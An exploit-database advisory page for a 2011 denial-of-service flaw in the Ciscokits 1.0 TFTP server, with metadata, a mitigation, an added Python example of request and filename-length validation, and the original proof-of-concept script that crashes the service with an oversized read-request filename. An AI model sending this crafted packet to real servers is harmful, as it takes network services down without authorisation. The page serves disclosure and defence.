Vendor: Ciscokits
By: Craig Freyman
CVSS: 7.5 (HIGH)
Type: Denial of Service (DoS)
CWE: 400
Product Name: Ciscokits
Affected Version From: 1
Affected Version To: 1
Patch Exists: YES
Related CWE: N/A
CPE: a:certificationkits:ciscokits
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
Year: 2011

Ciscokits 1.0 TFTP Long Filename DoS

When a read request with a long file name is made, the CPU will spike and within about 20 seconds the TFTP service will crash.

Mitigation:

Ensure that the TFTP server is configured to limit the length of filenames.
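
One way a TFTP server can enforce that limit, shown as an added example that is not part of the original advisory or the vendor's code: the request is size-checked and field-checked before the filename is used. The RFC 1350 framing (opcode, NUL-terminated filename and mode, ERROR opcode 5 with code 4) is standard; the limits MAX_REQUEST and MAX_FILENAME and the function names are assumptions chosen for illustration.

```python
import struct

OP_RRQ, OP_WRQ, OP_ERROR = 1, 2, 5
ERR_ILLEGAL_OP = 4        # RFC 1350 error code "Illegal TFTP operation"
MAX_REQUEST = 512         # assumed cap on the whole request datagram
MAX_FILENAME = 255        # assumed policy limit, not a value from the page
MODES = {b"netascii", b"octet", b"mail"}


class BadRequest(ValueError):
    """Request the server must refuse before doing any further work."""


def parse_request(datagram: bytes):
    """Return (opcode, filename, mode) or raise BadRequest."""
    # Reject on total size first: cheap, and nothing is scanned or copied yet.
    if not 4 <= len(datagram) <= MAX_REQUEST:
        raise BadRequest("request size out of range")
    (opcode,) = struct.unpack("!H", datagram[:2])
    if opcode not in (OP_RRQ, OP_WRQ):
        raise BadRequest("not a read or write request")
    # Filename and mode are NUL-terminated; option fields may follow the mode.
    fields = datagram[2:].split(b"\0")
    if len(fields) < 3:
        raise BadRequest("missing NUL terminator")
    filename, mode = fields[0], fields[1].lower()
    if not 1 <= len(filename) <= MAX_FILENAME:
        raise BadRequest("filename length out of range")
    if any(b < 0x20 or b > 0x7E for b in filename):
        raise BadRequest("filename is not printable ASCII")
    if mode not in MODES:
        raise BadRequest("unknown transfer mode")
    return opcode, filename.decode("ascii"), mode.decode("ascii")


def handle(datagram: bytes):
    """Return the parsed request, or the ERROR packet to send back."""
    try:
        return parse_request(datagram)
    except BadRequest as exc:
        msg = str(exc).encode("ascii") + b"\0"
        return struct.pack("!HH", OP_ERROR, ERR_ILLEGAL_OP) + msg


if __name__ == "__main__":
    # Constructed sample datagrams: one normal RRQ, one with a 2500-byte name.
    for pkt in (b"\x00\x01boot.cfg\0netascii\0",
                b"\x00\x01" + b"A" * 2500 + b"\0netascii\0"):
        print(handle(pkt))
```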

Exploit-DB raw data:

#!/usr/bin/python
#Title: Ciscokits 1.0 TFTP Long Filename DoS
#Author: Craig Freyman (@cd1zz)
#Date: July 22, 2011
#Software Link: http://www.certificationkits.com/tftpserver/tftpserver.zip
#Tested on: Windows XP SP3
#Vendor notified: July 22, 2010 - Vendor approved release of PoC on July 23, 2010. 
#Notes: When a long file name read request is made the CPU will spike
#and within about 20 seconds the TFTP service will crash.

import socket,sys,time

host = '192.168.133.128'
port = 69

try:
	s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
	print "socket() failed"
	sys.exit(1)

crash = "\x41" * 2500

mode = "netascii"
files = "a"
print "File name READ crash"
#seems to only work on a READ command = x01
pwned = "\x00\x01" + crash + "\0" + mode + "\0"
s.sendto(pwned, (host, port))
time.sleep(2)